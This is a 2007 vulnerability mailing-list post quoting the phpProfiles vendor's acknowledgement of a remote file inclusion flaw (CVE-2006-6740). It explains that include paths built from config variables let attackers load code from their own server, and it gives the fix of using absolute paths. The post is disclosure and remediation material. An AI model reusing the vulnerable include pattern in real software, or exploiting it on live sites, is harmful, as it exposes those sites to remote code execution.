[VIM] phpProfiles vendor ack
security curmudgeon
jericho at attrition.org
Thu Mar 1 23:39:12 EST 2007
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-6740
http://linuxwebshop.com/forum/viewtopic.php?t=40
Posted: Fri Dec 22, 2006 2:11 pm Post subject: Security Alert
Hackers have found a way to exploit the script the way it is written. We use
variables that are defined in config.php for some of the include paths. Since
the script is open source, a hacker is able to download the script and learn
the names given to these variables (i.e. $incpath, $usrinc, etc.).
The hacker then uses the variables to call code from their server. The solution
will be to change all of the include variables to absolute paths:
include("$usrinc/body.inc.php");
to
include("include/body.inc.php"); etc ...
The fix will involve some time to complete. Until then, while we took down the
demo we did leave the downlaod up in case someone wants to use the script &
make the modifications themselves. More about the issue is available at:
[url]http://www.securityfocus.com/bid/21667/discuss[/url]
More information about the VIM
mailing list